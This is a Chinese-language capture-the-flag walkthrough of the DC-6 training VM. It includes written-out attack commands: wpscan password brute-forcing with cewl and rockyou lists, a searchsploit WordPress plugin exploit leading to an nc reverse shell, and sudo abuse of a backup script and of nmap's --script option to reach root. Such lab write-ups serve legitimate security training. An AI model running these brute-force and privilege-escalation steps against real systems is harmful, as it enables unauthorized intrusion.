DC-6靶场

文章目录

  • 下载地址
  • 信息搜集
  • 密码爆破
  • 反弹shell
  • 提权
  • 得到flag

下载地址

DC-6下载地址

信息搜集

DC-6靶场_第1张图片

获取地址,发现地址为192.168.28.138,然后直接nmap全扫描。

DC-6靶场_第2张图片

首先,发现了

http-title: Did not follow redirect to http://wordy/  

地址被指向了wordy ,所以需要去修改一下hosts的配置。

vim /etc/hosts
192.168.28.138 wordy

image-20230306180405516

其次,明显的看出来该靶场大概的系统及版本,直接用dir扫。

DC-6靶场_第3张图片

在/wp-login.php发现登录框,跟之前那个一样,直接爆破账号密码。

密码爆破

首先用wpscan爆破出账号。

DC-6靶场_第4张图片

扫出来5个,存入user.txt文件。

然后用cewl去爬密码。

cewl http://wordy -w passwd.txt

直接用wpscan爆破。

wpscan --url http://wordy -U user.txt -P passwd.txt

但是没爆破出来,去换一下自带吗密码库,继续尝试。

gunzip /usr/share/wordlists/rockyou.txt.gz /usr/share/wordlists/rockyou.txt
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwd.txt
wpscan --url wordy -U user.txt -P passwd.txt

没跑完就出来一个。

image-20230306182318085

直接登录,发现了版本信息,在后台发现了插件。

DC-6靶场_第5张图片

反弹shell

在网上搜索后发现此插件存在漏洞,searchsploit搜一下。

DC-6靶场_第6张图片

然后下载下来,修改

DC-6靶场_第7张图片

然后在本地起一个http服务。(这里以python3演示)

python -m http.server 80

DC-6靶场_第8张图片

然后本地访问即可。

DC-6靶场_第9张图片

先本地开启nc接收,然后点击一下即可。

提权

先进入交互模式。

python -c "import pty;pty.spawn('/bin/bash')"

find里没有找到flag,但是在mark目录里得到了things-to-do.txt文件。

Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

获得密码后直接ssh远程登录。

ssh [email protected]

DC-6靶场_第10张图片

查看可执行命令,发现了以jens身份执行的文件。

image-20230306223511726

看一下,在结尾加上/bin/sh。(需要在/home/jens目录下)

然后以jens的身份去执行命令,身份会切换到jens。

sudo -u jens ./backups.sh

image-20230306224116075

继续查看可执行命令。

image-20230306224433731

然后发现了nmap,利用其提权。(这种操作第一次见)

echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell

得到flag

进入root模式后直接cd进入root目录然后即可看到theflag.txt。

DC-6靶场_第11张图片

你可能感兴趣的:(DC靶场集合,安全,linux)